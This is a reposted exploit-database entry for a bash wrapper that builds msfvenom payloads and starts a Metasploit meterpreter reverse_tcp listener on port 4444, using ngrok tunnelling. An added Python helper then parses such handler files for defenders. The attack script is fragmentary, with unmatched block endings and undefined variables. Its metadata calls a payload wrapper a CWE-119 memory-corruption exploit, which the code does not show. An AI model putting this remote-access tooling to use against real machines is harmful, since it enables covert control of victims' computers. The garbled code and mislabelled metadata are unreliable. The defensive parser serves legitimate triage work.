Windows x32-x64 MSFVenom TCP/80-4444 Remote Management Exploit

CVE: (none listed)
Category: CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
Price: Not Specified
Severity: High
Author: Not Specified
Risk: High
Exploitation Type: Remote
Date: 2020-06-21
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.9214
EPSSP: 0.5579


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060090

Below is a copy:

Windows x32-x64 MSFVenom TCP/80-4444 Remote Management Exploit
#Author : Gaddar
#Team : SiyahBayrak Turkish Vulnerability Researchers
#Video : https://youtu.be/oPBI0ELz44g
#Note : I used the CatchYou software in the video. It can also be exploited without software.
#Tested on Kali Linux 2020.2
#Payload Tested on Win10 x64 and Win7 x64
#Instagram : @pt.php

Exp;

command -v msfvenom > /dev/null 2>&1 || { echo >&2; exit 1; }
command -v i686-w64-mingw32-gcc > /dev/null 2>&1 || { echo >&2; exit 1; }
command -v base64 > /dev/null 2>&1 || { echo >&2; exit 1; }
command -v zip > /dev/null 2>&1 || { echo >&2; exit 1; }
command -v netcat > /dev/null 2>&1 || { echo >&2; exit 1; }

Requirements;
Ngrok or other DNS/tunnelling services (https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip) - For amd64
Netcat : "nc [options] 127.0.0.1 4444"

Metasploit Framework;

default_listr="Y"
read -p $'\n\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Start Metasploit Listener? \e[0m\e[1;77m[Y/n]\e[0m\e[1;33m: \e[0m' listr
listr="${listr:-${default_listr}}"
if [[ $listr == Y || $listr == y || $listr == Yes || $listr == yes ]]; then
printf "use exploit/multi/handler\n" > handler.rc
printf "set payload %s\n" $payload_msf >> handler.rc
if [[ $forward == true ]];then
printf "set LHOST 127.0.0.1\n" >> handler.rc
else
printf "set LHOST %s\n" $server_tcp >> handler.rc
fi
printf "set LPORT %s\n" $server_port >> handler.rc
#printf "set ExitOnSession false\n" >> handler.rc
#printf "exploit -j -z\n" >> handler.rc
printf "exploit\n" >> handler.rc
msfconsole -r handler.rc
rm -rf handler.rc
fi
fi
}

Note : handler.rc as generated by CatchYou

Handler.rc;
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp [default]
set LHOST 127.0.0.1
set LPORT 4444
exploit
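For the defender side, here is an added example (not from the original post or from the CatchYou project) of a small triage helper that parses a Metasploit resource file such as the handler.rc above and summarises which listener it configures. The file contents, function names and the finding wording are all constructed for this illustration.

```python
"""Triage helper: summarise a Metasploit resource (.rc) handler file.

Parses 'use' / 'set' / 'exploit' lines and reports the payload, LHOST and
LPORT, flagging a loopback LHOST (what the script above sets when it
forwards through a tunnel such as ngrok). Added example, not project code.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: the handler.rc shown on the page, including the
# stray "[default]" annotation that an analyst may find copied verbatim.
SAMPLE_RC = """use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp [default]
set LHOST 127.0.0.1
set LPORT 4444
exploit
"""

@dataclass
class HandlerConfig:
    module: Optional[str] = None
    options: Dict[str, str] = field(default_factory=dict)
    runs: bool = False  # True if the file actually launches the handler

def parse_rc(text: str) -> HandlerConfig:
    cfg = HandlerConfig()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blanks
        if not line:
            continue
        parts = line.split()
        if parts[0] == "use" and len(parts) >= 2:
            cfg.module = parts[1]
        elif parts[0] in ("set", "setg") and len(parts) >= 3:
            # msfconsole option names are case-insensitive; keep only the
            # first value token so trailing notes like "[default]" are dropped.
            cfg.options[parts[1].upper()] = parts[2]
        elif parts[0] in ("exploit", "run"):
            cfg.runs = True
    return cfg

def describe(cfg: HandlerConfig) -> List[str]:
    """Return human-readable findings for a triage report."""
    findings = []
    if cfg.module == "exploit/multi/handler":
        findings.append("generic payload handler (exploit/multi/handler)")
    payload = cfg.options.get("PAYLOAD", "")
    if "reverse" in payload:
        findings.append(f"reverse-connect payload: {payload}")
    lhost, lport = cfg.options.get("LHOST"), cfg.options.get("LPORT")
    if lhost in ("127.0.0.1", "localhost"):
        findings.append(f"loopback LHOST {lhost}: reachable only via a local tunnel")
    if lport:
        findings.append(f"listener on TCP/{lport}")
    if cfg.runs:
        findings.append("file starts the handler when sourced by msfconsole")
    return findings
```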
